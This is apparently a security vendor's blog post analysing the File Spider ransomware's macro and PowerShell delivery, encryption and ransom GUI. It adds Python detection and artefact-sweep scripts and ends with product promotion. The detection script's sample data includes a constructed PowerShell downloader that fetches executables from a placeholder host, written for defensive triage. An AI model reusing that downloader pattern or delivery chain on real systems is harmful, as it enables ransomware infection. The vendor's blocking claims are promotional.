A new ransomware variant called File Spider is giving infected victims 96 hours to recover their encrypted files. Find out how it works and see Barkly block it.
According to researchers @malwarehunterteam and @LawrenceAbrams, File Spider is currently being distributed through malspam and is spreading in countries such as Bosnia and Herzegovina, Croatia and Serbia. The spam email’s subject line is in Croatian, “Potraživanje Dugovanja”, which Google Translate renders as “Debt Collection”.
How File Spider is being delivered
Attackers are sending out spam emails that contain a Word document (BAYER_CROPSCIENCE_OFFICE_BEOGRAD_93876.doc) embedded with malicious macros.
Malicious Word document used to spread File Spider
If a user clicks the “Enable Editing” button after opening the file, the macro runs and attempts to download the malicious executables with the help of PowerShell.
The macro contains a PowerShell script that is Base64 encoded. When executed, it downloads two XOR-encrypted .exe files called ‘enc.exe’ and ‘dec.exe’.
These files are downloaded, XOR-decrypted, and saved on the computer at the location ‘%AppData%\Spider’.
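The delivery chain above (Office spawning PowerShell with a Base64-encoded command that stages files under %AppData%\Spider) is something a defender can catch from process-creation telemetry before the payloads ever run. The script below is an added example, not Barkly’s code or anything from the File Spider authors: it triages constructed Sysmon-style events, decodes the UTF-16LE Base64 blob that PowerShell’s -EncodedCommand expects, and pulls out the download URLs and staging directory. The download URLs and exact script text are placeholders; the page does not publish them.

```python
import base64
import re

# Constructed stand-in for the macro's PowerShell downloader. The URLs are
# placeholders (the write-up does not publish the real ones); the staging
# path %AppData%\Spider and the file names enc.exe / dec.exe come from the page.
SAMPLE_SCRIPT = (
    '$d="$env:APPDATA\\Spider";'
    'New-Item -ItemType Directory -Force $d | Out-Null;'
    '$w=New-Object Net.WebClient;'
    '$w.DownloadFile("http://placeholder.invalid/enc.exe","$d\\enc.exe");'
    '$w.DownloadFile("http://placeholder.invalid/dec.exe","$d\\dec.exe")'
)

# PowerShell's -EncodedCommand takes Base64 over UTF-16LE text, so we encode
# the constructed script the same way to build a realistic command line.
ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENC},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
]

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")

# Accepts the abbreviated forms PowerShell honours (-e, -ec, -enc, -encodedcommand).
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+")


def decode_encoded_command(cmdline: str):
    """Return the decoded script from an -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(script: str):
    return URL_RE.findall(script)


def triage(events):
    """Flag Office -> powershell.exe launches and explain why each is suspicious."""
    findings = []
    for ev in events:
        parent = ev["parent"].rsplit("\\", 1)[-1].lower()
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if parent not in OFFICE_APPS or image != "powershell.exe":
            continue
        reasons = ["office application spawned powershell.exe"]
        script = decode_encoded_command(ev["cmdline"])
        urls = []
        if script is not None:
            reasons.append("encoded command decoded")
            urls = extract_urls(script)
            if urls:
                reasons.append("downloads %d remote file(s)" % len(urls))
            if re.search(r"appdata.*spider", script, re.I):
                reasons.append("writes to %AppData%\\Spider (File Spider staging dir)")
        findings.append({"parent": parent, "reasons": reasons, "urls": urls, "script": script})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["parent"], "->", "; ".join(f["reasons"]))
        for u in f["urls"]:
            print("  fetches", u)
```

The parent/child pairing alone is a strong signal on most fleets; decoding the command adds the URLs and staging path you would block or hunt for across other hosts.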
The encryption process
Once the macro is executed and the files have been downloaded, the script runs the two malicious executables. Enc.exe is the encryptor responsible for scanning the local drives of the machine and encrypting targeted file types with AES-128 encryption. The encrypted files are then renamed with the .spider extension.
Additionally, the malware drops a file named HOW TO DECRYPT FILES.url in any folder containing encrypted files. When opened, the .url file redirects to hxxps://vid.me/embedded/CGyDc?autoplay=1&stats=1, which displays a video tutorial of how to decrypt the files.
Finally, enc.exe creates a file named ‘%UserProfile%\AppData\Roaming\Spider\5p1d3r’ and then deletes itself, thereby triggering the second file — ‘dec.exe’ — to run.
Ransom note GUI
On execution, dec.exe creates a Windows Registry entry that triggers it to be launched on startup. Following that, it displays the ransom payment instruction page with the help of a GUI.
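The artefacts described in the encryption and persistence steps (.spider files, the HOW TO DECRYPT FILES.url note, the %AppData%\Roaming\Spider staging folder with its 5p1d3r marker, and the startup registry entry for dec.exe) are what an incident responder sweeps for on other machines. The following is an added example, not Barkly’s or the malware authors’ code: it builds a constructed user profile in a temporary directory, sweeps it for those artefacts, and checks a constructed .reg export for a Run entry pointing at the staging folder. The page says only that dec.exe creates a startup registry entry; the HKCU Run key, the value name, the user name and the note contents are assumptions made for the sample.

```python
import re
import tempfile
from pathlib import Path

RANSOM_NOTE = "HOW TO DECRYPT FILES.url"
MARKER_FILE = "5p1d3r"
STAGING_DIR = Path("AppData") / "Roaming" / "Spider"
ENCRYPTED_EXT = ".spider"
PAYLOADS = ("enc.exe", "dec.exe")

# Constructed registry export. The Run key location and the "Spider" value
# name are assumptions; the page only states that dec.exe persists at startup.
REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"
"Spider"="C:\\Users\\alice\\AppData\\Roaming\\Spider\\dec.exe"
'''


def build_sample_profile(root: Path) -> Path:
    """Create a constructed post-infection profile matching the write-up."""
    profile = root / "Users" / "alice"
    docs = profile / "Documents"
    docs.mkdir(parents=True)
    (docs / "budget.xlsx.spider").write_bytes(b"\x00" * 16)  # renamed by enc.exe
    (docs / "notes.txt").write_text("untouched file type")
    (docs / RANSOM_NOTE).write_text("[InternetShortcut]\nURL=https://placeholder.invalid/\n")
    staging = profile / STAGING_DIR
    staging.mkdir(parents=True)
    (staging / "dec.exe").write_bytes(b"MZ")       # enc.exe has deleted itself by now
    (staging / MARKER_FILE).write_bytes(b"")        # marker that hands off to dec.exe
    return profile


def sweep_profile(profile: Path) -> dict:
    """Collect File Spider artefacts from a user profile directory."""
    found = {"encrypted": [], "notes": [], "staging": [], "marker": False}
    staging = profile / STAGING_DIR
    if staging.is_dir():
        for p in staging.iterdir():
            if p.name.lower() in PAYLOADS:
                found["staging"].append(p.name.lower())
            if p.name == MARKER_FILE:
                found["marker"] = True
        found["staging"].sort()
    for p in sorted(profile.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(profile).as_posix()
        if p.suffix.lower() == ENCRYPTED_EXT:
            found["encrypted"].append(rel)
        elif p.name == RANSOM_NOTE:
            found["notes"].append(rel)
    return found


def suspicious_run_entries(reg_text: str) -> list:
    """Return (name, command) pairs under a Run key that point at the staging dir or dec.exe."""
    hits, in_run = [], False
    for line in reg_text.splitlines():
        s = line.strip()
        if s.startswith("["):
            in_run = s.lower().endswith(r"\currentversion\run]")
            continue
        if not in_run:
            continue
        m = re.match(r'"([^"]+)"="(.*)"$', s)
        if not m:
            continue
        name, value = m.groups()
        if re.search(r"\\spider\\", value, re.I) or re.search(r"\\dec\.exe\b", value, re.I):
            hits.append((name, value))
    return hits


def run_demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        result = sweep_profile(build_sample_profile(Path(tmp)))
    result["run_entries"] = suspicious_run_entries(REG_EXPORT)
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The presence of the 5p1d3r marker together with dec.exe but no enc.exe tells you the encryptor has already finished on that host; a staging folder containing enc.exe without the marker means encryption may still be in progress and the process should be stopped first.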
File Spider in action
Victims are given a 96-hour deadline to pay. After that, the ransom note explains the decryption key will be “blocked” and all the victim’s files will be permanently encrypted.
Interestingly, the GUI appears to be designed to make the payment and decryption process seem less intimidating to victims. It provides instructions that walk victims through the entire payment process, from how to use the Tor Browser to how to obtain Bitcoin, and it consists of multiple tabs that allow the victim to toggle between English and Croatian, display their ID, and visit the Tor payment site. There’s even a “Help” tab that includes a link to a video tutorial.
Unfortunately, there is currently no way of decrypting files encrypted by File Spider without paying the ransom.
Barkly blocks a File Spider attack even if a user enables macros
Delivering ransomware via spam emails and fake invoices is a well-established (yet still very effective) tactic. Attackers know there will always be a portion of users who will fall for this trick, and they know it takes time for security vendors to update their protection to cover new variants.
Barkly, on the other hand, blocks new ransomware like File Spider automatically, without any updates necessary. Not only does it prevent the ransomware payload from executing, it prevents the macro embedded in the Word document from executing, thereby stopping the attack before the payloads can even touch the machine. As a result, no information is encrypted and no damage is incurred.
Barkly provides defense in depth against the File Spider attack by blocking it at multiple stages